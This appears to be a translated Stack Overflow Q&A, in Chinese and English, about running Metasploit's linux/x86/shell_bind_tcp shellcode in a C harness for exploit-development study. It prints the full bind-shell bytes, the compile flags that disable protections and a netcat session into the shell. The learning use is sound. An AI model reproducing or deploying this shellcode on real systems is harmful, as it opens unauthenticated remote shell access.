如何独立运行linux/x86/shell_bind_tcp有效负载?

本文介绍了如何独立运行linux/x86/shell_bind_tcp有效负载?的处理方法，对大家解决问题具有一定的参考价值，需要的朋友们下面随着小编来一起学习吧！

问题描述

我正在沙盒C程序中运行Metasploit有效负载.

I'm running a Metasploit payload in a sandbox c program.

下面是感兴趣的有效负载的摘要.从那里我生成一些shellcode并将其加载到我的沙箱中，但是当我运行它时，程序将只是等待.我认为这是因为它正在等待连接发送外壳程序，但是我不确定.

Below is a summary of the payload of interest. From there I generate some shellcode and load it up in my sandbox, but when I run it the program will simply wait. I think this is because it's waiting for a connection to send the shell, but I'm not sure.

我怎么去:

生成shellcode
将其加载到我的沙箱中
成功获得一个/bin/sh外壳<-这是我被卡住的部分.

Generating shellcode
Loading it into my sandbox
Successfully get a /bin/sh shell <- this is the part I'm stuck on.

基本设置:

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp S
[sudo] password for max: 

       Name: Linux Command Shell, Bind TCP Inline
     Module: payload/linux/x86/shell_bind_tcp
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 200
       Rank: Normal

Provided by:
  Ramon de C Valle <[email protected]>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LPORT  4444             yes       The listen port
RHOST                   no        The target address

Description:
  Listen for a connection and spawn a command shell

生成shellcode:

Generating shellcode:

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C

具有shellcode的沙盒程序:

Sandbox program with shellcode:

#include<stdio.h>
#include<string.h>
/*
objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
 */

unsigned char code[] = \
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";

main()
{

  printf("Shellcode Length:  %d\n", strlen(code));

  int (*ret)() = (int(*)())code;

  ret();

}

编译并运行.但是，这是我不确定如何获取/bin/sh shell的地方:

Compile and run. However, this is where I'm not sure how to get a /bin/sh shell:

max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  20
(program waiting here...waiting for a connection?)

在第一终端中，我运行我的shellcode程序:

In terminal one I run my shellcode program:

max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  20

现在在第二终端中，我检查tcp侦听器.给出-n来抑制主机名解析，给出-t代表tcp，给出-l代表侦听器，并给出-p来查看程序名称.

Now in terminal two, I check for tcp listeners. Giving -n to suppress host name resolution, -t for tcp, -l for listeners, and -p to see the program names.

我可以在端口4444上看到shellcode程序:

I can see the shellcode program on port 4444:

max@ubuntu-vm:~$ sudo netstat -ntlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address     Foreign Address       State     PID/Program name      
tcp      0    0     0.0.0.0:4444      0.0.0.0:*             LISTEN    14885/shellcode       
max@ubuntu-vm:~$

连接到telnet，似乎成功了，但仍然没有sh shell.

Connecting with telnet, and it seems like it was successful but still no sh shell.

max@ubuntu-vm:~$ telnet 0.0.0.0 4444
Trying 0.0.0.0...
Connected to 0.0.0.0.
Escape character is '^]'.

如何获得sh外壳?

推荐答案

生成shellcode，进行编译并运行:

Generate shellcode, compile and run:

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C
/*
 * linux/x86/shell_bind_tcp - 78 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false, 
 * PrependSetresuid=false, PrependSetreuid=false, 
 * PrependSetuid=false, PrependSetresgid=false, 
 * PrependSetregid=false, PrependSetgid=false, 
 * PrependChrootBreak=false, AppendExit=false, 
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  20

现在，在端子2中.检查连接情况，最后使用netcat连接.请注意，$不会出现，但是外壳仍然存在:

Now, in terminal 2. Check for connections and finally connect using netcat. Note, that the $ doesn't appear but the shell is still there:

max@ubuntu-vm:~$ sudo netstat -ntlp 
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address     Foreign Address     State       PID/Program name
tcp        0      0 0.0.0.0:4444      0.0.0.0:*           LISTEN      3326/shellcode    
max@ubuntu-vm:~$ nc 0.0.0.0 4444
pwd
/home/max/SLAE/mod2
whoami
max
ls -l
total 516
-rwxrwxr-x 1 max max    591 Jan  2 07:06 InsertionEncoder.py
-rwxrwxr-x 1 max max    591 Jan  2 07:03 InsertionEncoder.py~
-rwxrwxr-x 1 max max    471 Dec 30 17:00 NOTEncoder.py
-rwxrwxr-x 1 max max    471 Dec 30 16:57 NOTEncoder.py~
-rwxrwxr-x 1 max max    442 Jan  2 09:58 XOREncoder.py
-rwxrwxr-x 1 max max    442 Dec 30 08:36 XOREncoder.py~
-rwxrwxr-x 1 max max    139 Dec 27 08:18 compile.sh

这篇关于如何独立运行linux/x86/shell_bind_tcp有效负载?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持！